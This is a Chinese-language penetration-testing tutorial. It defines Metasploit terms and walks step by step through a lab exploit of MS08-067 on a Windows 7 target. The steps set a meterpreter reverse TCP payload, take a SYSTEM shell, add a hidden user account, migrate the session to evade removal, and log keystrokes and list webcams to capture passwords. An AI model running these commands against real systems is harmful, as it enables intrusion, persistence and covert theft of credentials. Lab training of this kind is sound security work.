渗透测试实战
渗透测试实战
一.渗透测试案例
1.Metasploit(渗透测试神器)
下载kali,kali上有很多做渗透测试的驱动,该软件在kali中就有
专业术语
- Exploit(渗透攻击):子弹头,利用系统,应用或者服务中的安全漏洞,所进行的攻击行为。流行的渗透攻击技术包括缓存区溢出、WEB应用程序漏洞攻击(SQL注入、XSS等),以及利用配置错误等。
- Payload(攻击荷载):火药,被渗透攻击后去执行的代码,在Metasploit中可以自由选择、传送和植入。
- ShellCode:是攻击荷载运行的一组机器指令,通常用汇编语言。
- Module:使用的软件代码组件
- Listener(监听器):是Metasploit中用来等待接入网络连接主机的组件。
常用术语
- 肉鸡:傀儡机,可以随意被控制的电脑和服务器。
- 木马:用来获取用户权限的程序或者代码段
- 后门:方便二次进入系统留下的后门程序
- 拿Shell:拿到对方的命令执行环境
- webshell:通过web入侵的脚本工具,对网站服务进行一定程度的控制
- poc:验证漏洞存在的代码或者程序
- exp:漏洞利用的代码或者程序
- Payload:有效攻击荷载,可以是一段代码,被隐藏并且秘密发送的信息。
2.主机漏洞利用演示
MS17-010 :永恒之蓝漏洞(勒索)
软件:Vmware Workstation 14
攻击机:kali
靶机环境:Win7
MS08-067 缓存区溢出漏洞
3.nmap 网络扫描工具
全名:network mapper
对ip地址段扫描 ,看目标网络上有哪些主机存活,哪些服务开放,甚至知道网络中用了哪种类型的防火墙设备
扫描命令:
4.渗透测试操作
1.打开kali
2.命令行输入msfconsole启动metasploit
3.输入nmap启动nmap
4.输入nmap -F 192.168.10.0/24进行扫描
5.需要在网络配置器中设置在同一个网段,在windows中自动获取
6.-F快速扫描出使用的端口,可以进行攻击
7.search ms08-067 查看漏洞是否有对应的攻击代码
8.use (对应代码)/(对应编号)
9.进入exploit攻击代码的模块中,添加攻击效果(设置PAYLOAD)
set PAYLOAD windows/meterpreter/reverse_tcp
功能为反转tcp,针对windows,利用meterpreter神器,该神器中集成了很多指令,方便简单操作,打进去后,反弹一个tcp连接回来,拿到相应的Shell,shell隐藏在meterpreter
10.设置完后,输入show options查看参数,空白的需要填,
如图,需要设置RHOSTS和LHOST,RHOSTS目标主机,LHOST监听主机
11.分别输入set RHOSTS 目标地址
set LHOST 自己的地址
12.输入run或者exploit则开始攻击
出现该页面表示入侵成功 在自己电脑的4444端口接受,对对方的445端口进行攻击
13.输入ps可以查看被攻击电脑的进程
输入getuid 显示自己拿到了最高权限SYSTEM
输入shell进入对方电脑的命令行(system32):里面存放了大量的工具
输入net user 查看用户
输入net user HVV 123456 /add 可以添加用户(提升为管理员,隐藏)
细思极恐,如果电脑系统中存在一些未公布的漏洞,则自己的电脑是非常危险的。
最后输入exit退出windows命令行进入到神器中。
14.在meterpreter中输入webcam_
在输入webcam_list 可以查看摄像头
输入ps 可以查看运行的进程
该进程表示桌面
- 输入migrate 1996 本身产生的session是留有痕迹的 而输入该命令可以将session迁移到桌面,伴生。不容易被干掉。
输入key
输入keyscan_start开启键盘的监听
当对方的键盘产生输入(可能输入某平台账号密码)
输入keyscan_dump此时在命令行显示了被攻击电脑键盘所输入的内容
16.类似操作很多,监听麦克风,摄像头,可以弹记事本。